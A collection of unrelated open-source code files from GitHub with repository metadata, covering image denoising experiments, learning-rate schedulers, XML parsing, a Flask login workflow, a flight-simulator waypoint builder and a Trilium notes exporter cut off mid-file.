reduction_result = reducer.reduce_noise(
original_image=image_pair.ground_truth, observation=image_pair.observation,
)
reduced_image = PIL.Image.fromarray(reduction_result.reduced_image.astype(np.uint8))
reduced_image.save(os.path.join(storage_folder, f"reduced_image_{image_pair.image_id}.png"), format="PNG")
with open(os.path.join(storage_folder, "average_statistics.pickle"), mode="wb") as file_stream:
pickle.dump(reducer.average_statistics, file_stream)
def run_with_gibbs_reducer(experiment):
print(f"Gibbs sampling for experiment {experiment.experiment_name} started!")
reducer = GrayscaleGibbsNoiseReducer(
noise_level_prior=experiment.noise_level, observation_strength=1.0, coupling_strength=4.0,
iterations_count=ITERATIONS_PER_EXPERIMENT, iterations_per_evaluation=ITERATIONS_PER_EVALUATION,
)
storage_folder = os.path.join(
IMAGES_PATH, experiment.experiment_name, f"grayscale_gibbs_reducer_{round(experiment.noise_level * 100)}"
)
run_with_reducer(reducer, experiment.experiment_name, storage_folder)
print(f"Gibbs sampling for experiment {experiment.experiment_name} done!")
def run_with_gradient_reducer(experiment):
print(f"Gradient-based sampling for experiment {experiment.experiment_name} started!")
reducer = GrayscaleGradientNoiseReducer(
noise_level_prior=experiment.noise_level, observation_strength=1.0, coupling_strength=4.0, temperature=2.0,
iterations_count=ITERATIONS_PER_EXPERIMENT, iterations_per_evaluation=ITERATIONS_PER_EVALUATION,
)
storage_folder = os.path.join(
IMAGES_PATH, experiment.experiment_name, f"grayscale_gradient_reducer_{round(experiment.noise_level * 100)}"
)
run_with_reducer(reducer, experiment.experiment_name, storage_folder)
print(f"Gradient-based sampling for experiment {experiment.experiment_name} done!")
def run_with_reducer_type(experiment, reducer_type):
if reducer_type == "gibbs":
run_with_gibbs_reducer(experiment)
elif reducer_type == "gradient":
run_with_gradient_reducer(experiment)
else:
raise ValueError("Invalid type of reducer")
def run_script():
arguments_to_run = list(itertools.chain(
zip(EXPERIMENTS, ["gibbs"] * len(EXPERIMENTS)),
zip(EXPERIMENTS, ["gradient"] * len(EXPERIMENTS)),
))
with Pool(processes=6) as pool:
pool.starmap(run_with_reducer_type, arguments_to_run)
if __name__ == "__main__":
run_script()
| Dawidsoni/noise-reduction | noise-reduction/generate_grayscale_statistics.py | generate_grayscale_statistics.py | py | 4,224 | python | en | code | 0 | github-code | 36 |
70511120745 | import os
FEATURE_LOC = './data/jaffe_test_features'
files = os.listdir(FEATURE_LOC)
features = {}
for filename in files:
path = '/'.join([FEATURE_LOC, filename])
# Remove all files with a space in them
if ' ' in filename:
os.remove(path)
continue
f = open(path)
point_arr = []
for line in f:
# Remove comma
split_arr = line.split(',')
point = [ float(split_arr[0]), float(split_arr[1]) ]
point_arr.append(point)
filename_arr = filename.split('_')
filename_arr_back = filename_arr[1].split('.')
features[int(filename_arr_back[0])] = point_arr
labels = 'var jaffe_test_features = ' + repr(features) + ';\n'
open('./data/processed/jaffe_test_features.js', 'w').write(labels)
| Hansenq/face-emoticon | process_features.py | process_features.py | py | 771 | python | en | code | 2 | github-code | 36 |
14582084682 | # -*- coding: utf-8 -*-
# @Author : Devin Yang(pistonyang@gmail.com), Gary Lai (glai9665@gmail.com)
__all__ = ['CosineWarmupLr', 'get_cosine_warmup_lr_scheduler', 'get_layerwise_decay_params_for_bert']
from math import pi, cos
from torch.optim.optimizer import Optimizer
from torch.optim.lr_scheduler import LambdaLR
class Scheduler(object):
def __init__(self):
raise NotImplementedError
def get_lr(self):
raise NotImplementedError
def state_dict(self):
"""Returns the state of the scheduler as a :class:`dict`.
It contains an entry for every variable in self.__dict__ which
is not the optimizer.
"""
return {key: value for key, value in self.__dict__.items() if key != 'optimizer'}
def load_state_dict(self, state_dict):
"""Loads the schedulers state.
Arguments:
state_dict (dict): scheduler state. Should be an object returned
from a call to :meth:`state_dict`.
"""
self.__dict__.update(state_dict)
class CosineWarmupLr(Scheduler):
"""Cosine lr decay function with warmup.
Lr warmup is proposed by `
Accurate, Large Minibatch SGD:Training ImageNet in 1 Hour`
`https://arxiv.org/pdf/1706.02677.pdf`
Cosine decay is proposed by `
Stochastic Gradient Descent with Warm Restarts`
`https://arxiv.org/abs/1608.03983`
Args:
optimizer (Optimizer): optimizer of a model.
batches_per_epoch (int): batches per epoch.
epochs (int): epochs to train.
base_lr (float): init lr.
target_lr (float): minimum(final) lr.
warmup_epochs (int): warmup epochs before cosine decay.
warmup_lr (float): warmup starting lr.
last_iter (int): init iteration.
Attributes:
niters (int): number of iterations of all epochs.
warmup_iters (int): number of iterations of all warmup epochs.
"""
def __init__(self,
optimizer,
batches: int,
epochs: int,
base_lr: float,
target_lr: float = 0,
warmup_epochs: int = 0,
warmup_lr: float = 0,
last_iter: int = -1):
if not isinstance(optimizer, Optimizer):
raise TypeError('{} is not an Optimizer'.format(type(optimizer).__name__))
self.optimizer = optimizer
if last_iter == -1:
for group in optimizer.param_groups:
group.setdefault('initial_lr', group['lr'])
last_iter = 0
else:
for i, group in enumerate(optimizer.param_groups):
if 'initial_lr' not in group:
raise KeyError("param 'initial_lr' is not specified "
"in param_groups[{}] when resuming an optimizer".format(i))
self.baselr = base_lr
self.learning_rate = base_lr
self.total_iters = epochs * batches
self.targetlr = target_lr
self.total_warmup_iters = batches * warmup_epochs
self.total_cosine_iters = self.total_iters - self.total_warmup_iters
self.total_lr_decay = self.baselr - self.targetlr
self.warmup_lr = warmup_lr
self.last_iter = last_iter
self.step()
def get_lr(self):
if self.last_iter < self.total_warmup_iters:
return self.warmup_lr + \
(self.baselr - self.warmup_lr) * self.last_iter / self.total_warmup_iters
else:
cosine_iter = self.last_iter - self.total_warmup_iters
cosine_progress = cosine_iter / self.total_cosine_iters
return self.targetlr + self.total_lr_decay * \
(1 + cos(pi * cosine_progress)) / 2
def step(self, iteration=None):
"""Update status of lr.
Args:
iteration(int, optional): now training iteration of all epochs.
Usually no need to set it manually.
"""
if iteration is None:
iteration = self.last_iter + 1
self.last_iter = iteration
self.learning_rate = self.get_lr()
for param_group in self.optimizer.param_groups:
param_group['lr'] = self.learning_rate
def get_cosine_warmup_lr_scheduler(optimizer : Optimizer,
batches_per_epoch: int,
epochs: int,
warmup_epochs: int = 0,
last_epoch: int = -1):
"""Similar to CosineWarmupLr, with support for different learning rate for different parameter groups as well as better compatibility with current PyTorch API
Args:
optimizer (Optimizer): optimizer of a model.
batches_per_epoch (int): batches per epoch.
epochs (int): epochs to train.
warmup_epochs (int): warmup epochs before cosine decay.
last_epoch (int): the index of the last epoch when resuming training.
Example:
```
batches_per_epoch = 10
epochs = 5
warmup_epochs = 1
params = get_layerwise_decay_params_for_bert(model)
optimizer = optim.SGD(params, lr=3e-5)
lr_scheduler = get_cosine_warmup_lr_scheduler(optimizer, batches_per_epoch, epochs, warmup_epochs=warmup_epochs)
```
"""
total_steps = epochs * batches_per_epoch
# warmup params
total_warmup_steps = batches_per_epoch * warmup_epochs
# cosine params
total_cosine_steps = total_steps - total_warmup_steps
def lr_lambda(current_step):
# lr_lambda should return current lr / top learning rate
if current_step < total_warmup_steps:
warmup_progress = current_step / total_warmup_steps
return warmup_progress
else:
cosine_step = current_step - total_warmup_steps
cosine_progress = cosine_step / total_cosine_steps
return (1 + cos(pi * cosine_progress)) / 2
return LambdaLR(optimizer, lr_lambda, last_epoch)
def get_differential_lr_param_group(param_groups, lrs):
"""Assigns different learning rates to different parameter groups.
Discriminative fine-tuning, where different layers of the network have different learning rates, is first proposed in
`Jeremy Howard and Sebastian Ruder. 2018. Universal language model fine-tuning for text classification.
https://arxiv.org/pdf/1801.06146.pdf.` It has been found to stabilize training and speed up convergence.
Args:
param_groups: a list of parameter groups (each of which is a list of parameters)
param group should look like:
[
[param1a, param1b, ..] <-- parameter group 1
[param2a, param2b, ..] <-- parameter group 2
...
]
lrs: a list of learning rates you want to assign to each of the parameter groups
lrs should look like
[
lr1, <-- learning rate for parameter group 1
lr2, <-- learning rate for parameter group 2
...
]
Returns:
parameter groups with different learning rates that you can then pass into an optimizer
"""
assert len(param_groups) == len(lrs), f"expect the learning rates to have the same lengths as the param_group length, instead got {len(param_groups)} and {len(lrs)} as lengths respectively"
param_groups_for_optimizer = []
for i in range(len(param_groups)):
param_groups_for_optimizer.append({
'params': param_groups[i],
'lr': lrs[i]
})
return param_groups_for_optimizer
def get_layerwise_decay_param_group(param_groups, top_lr=2e-5, decay=0.95):
"""Assign layerwise decay learning rates to parameter groups.
Layer-wise decay learning rate is used in `Chi Sun, Xipeng Qiu, Yige Xu, and Xuanjing Huang. 2019.
How to fine-tune BERT for text classification? https://arxiv.org/abs/1905.05583` to improve convergence
and prevent catastrophic forgetting.
Args:
param_groups: a list of parameter groups
param group should look like:
[
[param1a, param1b, ..] <-- parameter group 1
[param2a, param2b, ..] <-- parameter group 2
..
]
top_lr: learning rate of the top layer
decay: decay factor. When decay < 1, lower layers have lower learning rates; when decay == 1, all layers have the same learning rate
Returns:
parameter groups with layerwise decay learning rates that you can then pass into an optimizer
Examples:
```
param_groups = get_layerwise_decay_params_group(model_param_groups, top_lr=2e-5, decay=0.95)
optimizer = AdamW(param_groups, lr = 2e-5)
```
"""
lrs = [top_lr * pow(decay, len(param_groups)-1-i) for i in range(len(param_groups))]
return get_differential_lr_param_group(param_groups, lrs)
def get_layerwise_decay_params_for_bert(model, number_of_layer=12, top_lr=2e-5, decay=0.95):
"""Assign layerwise decay learning rates to parameter groups of BERT.
Layer-wise decay learning rate is used in `Chi Sun, Xipeng Qiu, Yige Xu, and Xuanjing Huang. 2019.
How to fine-tune BERT for text classification? https://arxiv.org/abs/1905.05583` to improve convergence
and prevent catastrophic forgetting.
Args:
model: your BERT model
number_of_layer: number of layers your BERT has
top_lr: learning rate of the top layer
decay: decay factor. When decay < 1, lower layers have lower learning rates; when decay == 1, all layers have the same learning rate
Returns:
BERT parameter groups with different learning rates that you can then pass into an optimizer
Example:
```
param_groups = get_layerwise_decay_params_for_bert(model, number_of_layer=12, top_lr=2e-5, decay=0.95)
optimizer = AdamW(param_groups, lr = 2e-5)
```
"""
param_groups = get_param_group_for_bert(model, number_of_layer=number_of_layer, top_lr=top_lr, decay=decay)
param_groups_for_optimizer = get_layerwise_decay_param_group(param_groups, top_lr=top_lr, decay=decay)
return param_groups_for_optimizer
def get_param_group_for_bert(model, number_of_layer=12, top_lr=2e-5, decay=0.95):
"""separate each layer of a BERT models into a parameter group
Args:
model: your BERT model
number_of_layer: number of layers your BERT has
top_lr: learning rate of the top layer
decay: decay factor. When decay < 1, lower layers have lower learning rates; when decay == 1, all layers have the same learning rate
Returns:
a param group that should look like:
[
...
[param1a, param1b, ..] <-- parameter group 1, layer 1 of BERT
[param2a, param2b, ..] <-- parameter group 2, layer 2 of BERT
...
]
"""
param_groups_for_optimizer = [[] for _ in range(number_of_layer+2)] # tail, layer0, layer1 ...., layer11, head
head = {'pooler', 'norm', 'relative_attention_bias'}
tail = {'embeddings',}
layers = [f'layer.{i}.' for i in range(number_of_layer)]
for name, param in model.named_parameters():
if belongs(name, tail):
param_groups_for_optimizer[0].append(param)
elif belongs(name, head):
param_groups_for_optimizer[-1].append(param)
else:
for i, layer in enumerate(layers):
if layer in name:
param_groups_for_optimizer[i+1].append(param)
return param_groups_for_optimizer
def belongs(name, groups):
""" checks if name belongs to any of the group
"""
for group in groups:
if group in name:
return True
return False
| PistonY/torch-toolbox | torchtoolbox/optimizer/lr_scheduler.py | lr_scheduler.py | py | 11,278 | python | en | code | 409 | github-code | 36 |
570436896 | import logging
from .geomsmesh import geompy
def sortFaces(facesToSort):
"""tri des faces par surface"""
logging.info('start')
l_surfaces = [(geompy.BasicProperties(face)[1], i, face) for i, face in enumerate(facesToSort)]
l_surfaces.sort()
facesSorted = [face for _, i, face in l_surfaces]
return facesSorted, l_surfaces[0][0], l_surfaces[-1][0]
| luzpaz/occ-smesh | src/Tools/blocFissure/gmu/sortFaces.py | sortFaces.py | py | 362 | python | en | code | 2 | github-code | 36 |
34036030280 | # a good example of multi threading is Sending and Receiving Messages
import threading
class AndreMessenger(threading.Thread):
def run(self):
for _ in range(10):
print(threading.currentThread().getName())
x = AndreMessenger(name = 'Send Thread')
y = AndreMessenger(name = 'Recieve Thread')
x.start()
y.start()
| andrevicencio21/newBoston3.0PythonTutorials | PythonNewBoston/t34Threading.py | t34Threading.py | py | 362 | python | en | code | 0 | github-code | 36 |
41047380685 | """By: Xiaochi (George) Li: github.com/XC-Li"""
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import ParseError
from bs4 import BeautifulSoup
def bs_parser(file_name, target_id):
"""
XML Parser implemented by Beautiful Soup Package
Args:
file_name(str): path to the document
target_id(str): the person_id of speaker of target document
Returns:
speech(str): the speech of the speaker
"""
text_list = []
with open(file_name, encoding='utf-8') as file:
soup = BeautifulSoup(file, 'xml')
target_speech = soup.find_all('speaker', personId=target_id)
if len(target_speech) > 1:
pass
# print('multiple speech:', target_id, file_name)
for item in target_speech:
# s = item.get_text(strip=False) # this will cause the string in subtag concatenated together
for s in item.stripped_strings: # bug fix: fix the problem on previous line
text_list.append(s)
return ' '.join(text_list)
def xml_parser(file_name, target_id):
"""
XML Parser implemented by xml package
Args:
file_name(str): path to the document
target_id(str): the person_id of speaker of target document
Returns:
speech(str): the speech of the speaker
"""
try:
tree = ET.parse(file_name, ET.XMLParser(encoding='utf-8'))
root = tree.getroot()
except ParseError:
with open(file_name, encoding='utf-8') as temp:
file_data = temp.read()
file_data = file_data.replace('&', 'and')
root = ET.fromstring(file_data)
text_list = []
for child in root[0]:
if child.tag == 'speaker':
if 'personId' in child.attrib: # contain person ID
person_id = child.attrib['personId']
else:
continue
if str(person_id) != str(target_id): # multiple speaker in a document, not target speaker
continue
for item in child.findall('p'):
if len(item) == 0:
text_list.append(item.text)
else: # multiple sub tag inside 'p' tag
if item.text is not None:
text_list.append(item.text)
text_list.append(' ')
for i in item:
if i.text is not None:
text_list.append(i.text)
text_list.append(' ')
if i.tail is not None:
text_list.append(i.tail)
text_list.append(' ')
return ''.join(text_list)
def xml_to_person_id(file_name):
"""
NO LONGER USEFUL
XML parser to get the person_ids from given XML file
Args:
file_name(str): file name
Returns:
person_ids(set[int]): a set of person ids
"""
person_ids = set()
with open(file_name, encoding='utf-8') as file:
soup = BeautifulSoup(file, 'xml')
all_speech = soup.find_all('speaker')
for single_speech in all_speech:
try:
person_ids.add(single_speech['personId'])
except KeyError:
continue
return person_ids
def get_person_speech_pair(file_name):
"""
XML parser to get the person_ids from given XML file
Args:
file_name(str): file name
Returns:
person_id_speech_pair(dict): Dict[person_id(int) -> speech(str)]
"""
person_id_speech_dict = dict()
with open(file_name, encoding='utf-8') as file:
soup = BeautifulSoup(file, 'xml')
all_speech = soup.find_all('speaker')
for single_speech in all_speech:
try: # newer format
person_id = single_speech['personId']
except KeyError:
try: # older format
person_id = single_speech['person']
except KeyError:
continue
single_speech_list = []
for s in single_speech.stripped_strings:
single_speech_list.append(s)
processed_speech = ' '.join(single_speech_list)
# print(parsed_speech, '\n')
if person_id not in person_id_speech_dict:
person_id_speech_dict[person_id] = []
person_id_speech_dict[person_id].append(processed_speech)
for person_id in person_id_speech_dict:
person_id_speech_dict[person_id] = ' '.join(person_id_speech_dict[person_id])
return person_id_speech_dict
if __name__ == '__main__':
# Sample: multiple sub-tag inside p tag
# print(xml_parser('../opinion_mining/cr_corpus/160/8/E63-E64/4407923.xml', '404'))
# print(bs_parser('../opinion_mining/cr_corpus/160/8/E63-E64/4407923.xml', '404'))
print(get_person_speech_pair("D:\\Github\\FN-Research-GW-Opinion-Mining\\opinion_mining\\cr_corpus\\146\\4\\E8-E10\\27718.xml"))
| XC-Li/FiscalNote_Project | deployment/util_code/xml_parser.py | xml_parser.py | py | 5,003 | python | en | code | 1 | github-code | 36 |
41561590327 | from api.core.workflow import workflow
from flask import request
import api.DAL.data_context.admin.user_update as user_update
import api.DAL.data_context.admin.user_insert as user_insert
import api.DAL.data_context.admin.user_select as user_select
from api.core.admin.credentials import Credentials
from api.core.admin.token import Token
from api.core.admin.validate import InvalidCredential
import api.core.admin.validate as validate
import api.core.response as response
import api.core.sanitize as sanitize
import json
@workflow.route('/admin/register', methods = ['POST'])
def register_user():
'''Called when adding a new user to the database. Makes sure that all information
provided is valid(see individual validations for details) and hashes the password for storage'''
credentials_form = json.loads(request.form['payload'])
credentials_form = sanitize.form_keys(credentials_form)
credentials = Credentials.map_from_form(credentials_form)
try:
validate.email(credentials.email)
validate.name(credentials.first_name)
validate.name(credentials.last_name)
validate.password(credentials.password)
except InvalidCredential as invalid:
return response.error(invalid.args[0])
credentials.hash_password()
user_insert.new_user(credentials)
return login()
@workflow.route('/admin/login', methods = ['POST'])
def login():
'''Called when a user is loging in (shocker)
Checks the provided email and password with the values stored in the database'''
credentials_form = json.loads(request.form['payload'])
credentials_form = sanitize.form_keys(credentials_form)
provided_credentials = Credentials.map_from_form(credentials_form)
stored_credentials = user_select.login_credentials(provided_credentials)
try:
validate.login(stored_credentials, provided_credentials)
except InvalidCredential as invalid:
return response.error(invalid.args[0])
token = Token()
token.user_id = stored_credentials.id
token.update()
user_update.token(token)
return response.add_token(token = token)
| RyanLadley/agility | api/core/workflow/admin_workflow.py | admin_workflow.py | py | 2,156 | python | en | code | 0 | github-code | 36 |
28513887827 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, sys, re
from opus_core.export_storage import ExportStorage
from opus_core.store.sql_storage import sql_storage
from opus_core.store.attribute_cache import AttributeCache
from opus_core.simulation_state import SimulationState
from opus_core.session_configuration import SessionConfiguration
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
from opus_core.database_management.database_server import DatabaseServer
from opus_core import paths
from opus_core.strings import create_list_string
def opusRun(progressCB,logCB,params):
params_dict = {}
for key, val in params.iteritems():
params_dict[str(key)] = str(val)
opus_data_directory = params_dict['opus_data_directory']
opus_data_directory = paths.prepend_opus_home_if_relative(opus_data_directory)
opus_data_year = params_dict['opus_data_year']
database_name = params_dict['database_name']
table_name = params_dict['table_name']
database_server_connection = params_dict['database_server_connection']
overwrite = params_dict['overwrite']
dbs_config = DatabaseServerConfiguration(database_configuration=database_server_connection)
server = DatabaseServer(database_server_configuration = dbs_config)
opusdb = server.get_database(database_name=database_name, create_if_doesnt_exist=False)
input_storage = sql_storage(storage_location = opusdb)
attribute_cache = AttributeCache(cache_directory=opus_data_directory)
output_storage = attribute_cache.get_flt_storage_for_year(opus_data_year)
SimulationState().set_current_time(opus_data_year)
SessionConfiguration(new_instance=True,
package_order=[],
in_storage=AttributeCache())
if table_name == 'ALL':
lst = input_storage.get_table_names()
else:
lst = re.split(' +', table_name.strip())
tables = len(lst)
lst_out = create_list_string(lst, ', ')
logCB('caching tables:\n%s\n' % lst_out)
for j, i in enumerate(lst, start=1):
logCB("Exporting table '%s' to year %s of cache located at %s...\n" %
(i, opus_data_year, opus_data_directory))
try:
ExportStorage().export_dataset(
dataset_name = i,
in_storage = input_storage,
out_storage = output_storage,
overwrite = overwrite,
)
except:
logCB('Error in exporting %s.' % i)
progressCB(100 * j / tables)
logCB('successfully cached tables:\n%s\n' % lst_out)
def opusHelp():
help = 'This tool will get a table from a SQL database and export it to the OPUS cache format.\n' \
'\n' \
'opus_data_directory: path to the OPUS data directory (full path, e.g., c:\\opus\\data\\seattle_parcel\\base_year_data, or relative to OPUS_HOME)\n' \
'opus_data_year: the year to which the data should be exported (2000)\n' \
'database_name: the name of the database (or PostgreSQL schema) that contains the table\n' \
'table_name: the name of the tables to be exported, separated by spaces. ALL imports all tables\n' \
'overwrite: overwrite table if it already exists in the DB\n' \
return help
| psrc/urbansim | opus_gui/data_manager/run/tools/sql_data_to_opus.py | sql_data_to_opus.py | py | 3,715 | python | en | code | 4 | github-code | 36 |
4200242133 | import gevent
def eat(name):
print('%s start task' % name)
gevent.sleep(2)
print('%s end task' % name)
return name + " finished callback"
def play(name):
print('%s start task' % name)
gevent.sleep(1)
print('%s end task' % name)
return name + " finished callback"
def callback(greenlet):
print("callback successfully: " + greenlet.value)
g1 = gevent.spawn(eat, 'marcia')
g1.link(callback)
g2 = gevent.spawn(play, name='joe')
g2.link(callback)
gevent.joinall([g1, g2])
print('主')
# import gevent
# from gevent import Greenlet
#
#
# def callback_func():
# print("callback successfully")
#
#
# class MyGreenlet(Greenlet):
# def __init__(self, timeout, msg):
# Greenlet.__init__(self)
# self.timeout = timeout
# self.msg = msg
#
# def _run(self):
# print("I'm from subclass of Greenlet and want to say: %s" % (self.msg,))
# gevent.sleep(self.timeout)
# print("done after sleep %s" % self.timeout)
#
#
# greenlet1 = MyGreenlet(2, 'hello')
# greenlet2 = MyGreenlet(1, 'world')
# greenlet1.start()
# greenlet2.start()
# greenlet1.rawlink(callback_func())
#
# gevent.joinall([greenlet1, greenlet2])
# print("main")
#
| Marcia0526/how_to_learn_python | coroutine/gevent_demo.py | gevent_demo.py | py | 1,215 | python | en | code | 0 | github-code | 36 |
21477660213 | # 맨 뒤에 있는 원소를 선택해서 이전에 만들어놓은 원소의 수열 갯수를 이용한다.
import sys
n = int(input())
arr = list(map(int, sys.stdin.readline().split()))
count = [1] * n
for i in range(n):
for j in range(i):
if arr[j] < arr[i]:
count[i] = max(count[i], count[j] + 1)
print(max(count))
| Minsoo-Shin/jungle | week02/연습만이 살길이다!!/11053_가장긴증가하는부분수열.py | 11053_가장긴증가하는부분수열.py | py | 353 | python | ko | code | 0 | github-code | 36 |
40568525715 | import logging
from dcs.point import MovingPoint
from dcs.task import EngageTargets, EngageTargetsInZone, Targets
from game.ato.flightplans.cas import CasFlightPlan
from game.utils import nautical_miles
from .pydcswaypointbuilder import PydcsWaypointBuilder
class CasIngressBuilder(PydcsWaypointBuilder):
def add_tasks(self, waypoint: MovingPoint) -> None:
if isinstance(self.flight.flight_plan, CasFlightPlan):
patrol_center = (
self.flight.flight_plan.layout.patrol_start.position
+ self.flight.flight_plan.layout.patrol_end.position
) / 2
waypoint.add_task(
EngageTargetsInZone(
position=patrol_center,
radius=int(self.flight.flight_plan.engagement_distance.meters),
targets=[
Targets.All.GroundUnits.GroundVehicles,
Targets.All.GroundUnits.AirDefence.AAA,
Targets.All.GroundUnits.Infantry,
],
)
)
else:
logging.error("No CAS waypoint found. Falling back to search and engage")
waypoint.add_task(
EngageTargets(
max_distance=int(nautical_miles(10).meters),
targets=[
Targets.All.GroundUnits.GroundVehicles,
Targets.All.GroundUnits.AirDefence.AAA,
Targets.All.GroundUnits.Infantry,
],
)
)
| dcs-liberation/dcs_liberation | game/missiongenerator/aircraft/waypoints/casingress.py | casingress.py | py | 1,579 | python | en | code | 647 | github-code | 36 |
22704754984 | def intersect(nums1, nums2):
nums3 = []
for i in nums2:
if i in nums1:
nums3.append(i)
nums1.remove(i)
return nums3
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
dict1 = dict()
res = []
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
for i in nums2:
if i in dict1 and dict1[i]>0:
res.append(i)
dict1[i] -= 1
return res
| CHENG-KAI/Leetcode | 350_interaction_of_two_array.py | 350_interaction_of_two_array.py | py | 684 | python | en | code | 0 | github-code | 36 |
35735822351 | import re
import webbrowser
import markdown
import dominate
from dominate.util import raw
from dominate.tags import *
from argparse import ArgumentParser
import shutil
import tempfile
import json
import os
from logging import *
import time
import bs4
import base64
from urllib.parse import unquote_plus
basicConfig(level="DEBUG")
class TriliumPdfExporter:
EXCLUDE = ["file"]
def __init__(self, source: str, motd: str) -> None:
self.source: str = source
self.motd: str = motd
self.md = markdown.Markdown(extensions=["extra", "pymdownx.tilde"])
self.idmap = {}
self.tempdir: str = None
self.meta = {}
def _extract(self):
tempdir = tempfile.TemporaryDirectory()
shutil.unpack_archive(self.source, tempdir.name)
return tempdir
def _pathtuple(self, path):
fullpath = unquote_plus(path).split(os.sep)
pathparts = []
while len(fullpath) > 0:
pathparts.append(os.sep.join(fullpath))
del fullpath[0]
return tuple(pathparts)
def _util_parse_meta_children(self, children: list, current: str) -> list:
out = []
for c in children:
if not c["type"] in self.EXCLUDE:
if "dataFileName" in c.keys():
parts = self._pathtuple(
os.path.join(current, c["dataFileName"]))
self.idmap[tuple(parts)] = c["noteId"]
out.append(
{
"title": c["title"],
"id": c["noteId"],
"type": c["type"],
"mime": c["mime"] if "mime" in c.keys() else None,
"source": c["dataFileName"]
if "dataFileName" in c.keys()
else None,
"path": c["dirFileName"] if "dirFileName" in c.keys() else None,
"content": None,
"children": self._util_parse_meta_children(
c["children"],
os.path.join(
current,
c["dirFileName"] if "dirFileName" in c.keys() else "",
),
)
if "children" in c.keys()
else [],
}
)
return out
def _analyze_metadata(self):
if not os.path.exists(os.path.join(self.tempdir.name, "!!!meta.json")):
critical("Failed to load: !!!meta.json file missing.")
exit(0)
with open(os.path.join(self.tempdir.name, "!!!meta.json"), "r") as f:
try:
raw = json.load(f)
except:
critical("Failed to load: !!!meta.json is bad JSON")
exit(0)
self.idmap[("",)] = "root"
out = {
"title": f"Exported Notes: {time.strftime('%m / %d / %Y')}",
"id": "root",
"type": "book",
"mime": None,
"source": None,
"path": "",
"content": None,
"children": self._util_parse_meta_children(raw["files"], ""),
}
return out
def _convert_to_html(self, item: dict, current: str, top: bool = False) -> str:
if top:
content = div(self.motd if self.motd else "",
_class="note-content")
else:
content = ""
if item["source"]:
if item["source"].endswith(".md"):
with open(
os.path.join(self.tempdir.name, current,
item["source"]), "r"
) as f:
debug(f"Parsing {item['source']}")
raw_md = f.read().replace("\\\\(", "$").replace("\\\\)", "$")
for k in re.findall("~.*?~", raw_md):
raw_md = raw_md.replace(k, "~" + k + "~")
content = div(
raw(
self.md.convert(
raw_md,
).replace("h1", "h5")
),
_class="note-content",
)
item["content"] = content
elif item["type"] == "canvas":
with open(os.path.join(self.tempdir.name, current, item["source"]), "r") as f:
debug(f"Parsing canvase {item['source']}")
svg = json.load(f)["svg"]
content = div(img(
src=f"data:image/svg+xml;base64,{base64.b64encode(svg.encode('utf-8')).decode('utf-8')}",
_class="svg"
),
_class="note-content note-svg"
)
item["content"] = content
else:
with open(
os.path.join(self.tempdir.name, current,
item["source"]), "rb"
) as f:
item["content"] = "data:{};base64,{}".format(
item["mime"] if item["mime"] else "text/plain",
base64.b64encode(f.read()).decode("utf-8"),
)
self.idmap[
self._pathtuple(os.path.join(
current, item["source"]))
] = item["content"]
head = div(
h2(item["title"]) if item["type"] == "book" else h4(item["title"]),
_class="note-header",
id=item["id"],
)
children = div(_class="note-children")
for c in item["children"]:
try:
children += self._convert_to_html(
c, os.path.join(
current, item["path"] if item["path"] else "")
)
except ValueError:
warning("Experienced tag creation error, skipping")
return div(head, content, children, _class="note")
def _generate_html(self):
document = dominate.document(
title=f"Exported Notes: {time.strftime('%m / %d / %Y')}"
)
with document.head:
link(
rel="stylesheet",
href="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.css",
integrity="sha384-Xi8rHCmBmhbuyyhbI88391ZKP2dmfnOl4rT9ZfRI7mLTdk1wblIUnrIq35nqwEvC",
crossorigin="anonymous",
)
script(
defer=True,
src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.js",
integrity="sha384-X/XCfMm41VSsqRNQgDerQczD69XqmjOOOwYQvr/uuC+j4OPoNhVgjdGFwhvN02Ja",
crossorigin="anonymous",
)
script(
defer=True,
src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/contrib/auto-render.min.js",
integrity="sha384-+XBljXPPiv+OzfbB3cVmLHf4hdUFHlWNZN5spNQ7rmHTXpd7WvJum6fIACpNNfIR",
crossorigin="anonymous",
onload="console.log(renderMathInElement(document.body, {delimiters: [{left: '$', right: '$', display: false}]}));",
)
style(
"""
.note-children {
padding-left: 8px;
border-left: 2px solid #dddddd;
}
img {
display: block;
}
.note-content.note-svg {
display: block;
width: 90%;
height: auto;
box-sizing: border-box;
padding: 8px;
border: 2px solid #dddddd;
margin-left: 4px;
background-color: white;
}
.note-content.note-svg img {
display: inline-block;
height: auto;
width: 100%;
}
"""
)
document += self._convert_to_html(self.meta, "", top=True)
return document
def _resolve_link(self, path):
if not re.match("^[a-z]*?://.*", path):
path = os.path.join(
*[i for i in path.split(os.sep) if not i == ".."])
return path
else:
return path
def _resolve_links(self):
soup = bs4.BeautifulSoup(self.doc, "html.parser")
for l in soup.find_all("a"):
if re.match("^[a-z]*?://.*", l["href"]):
continue
lnk = self._resolve_link(unquote_plus(l["href"]))
key = self._pathtuple(lnk)
l["href"] = "#root"
for k in self.idmap.keys():
if any([x in k for x in key]):
l["href"] = "#" + self.idmap[k]
for i in soup.find_all("img"):
if re.match("^[a-z]*?://.*", i["src"]) or i["src"].startswith("data:"):
continue
lnk = self._resolve_link(unquote_plus(i["src"]))
key = self._pathtuple(lnk)
i["src"] = ""
for k in self.idmap.keys():
if any([x in k for x in key]):
i["src"] = self.idmap[k]
return str(soup)
def export(self, preserve=False) -> str:
info("Extracting zip file into temporary directory...")
self.tempdir = self._extract()
info("Analyzing export metadata")
self.meta = self._analyze_metadata()
self.doc = self._generate_html().render()
self.doc = self._resolve_links()
with tempfile.NamedTemporaryFile("r+", suffix=".html") as f:
f.write(self.doc)
f.flush()
webbrowser.open(f"file://{f.name}")
time.sleep(1)
info("Cleaning up...")
self.tempdir.cleanup()
if not preserve:
os.remove(self.source)
if __name__ == "__main__":
parser = ArgumentParser(
description="Parse a compressed MD export of Trilium notes, then convert to a web page for easy download"
)
parser.add_argument(
"source", metavar="S", type=str, help="Path to source .zip file."
)
parser.add_argument(
"-p",
"--preserve",
help="Whether to preserve the source zip file. Defaults to false.",
action="store_true",
)
parser.add_argument(
"-m",
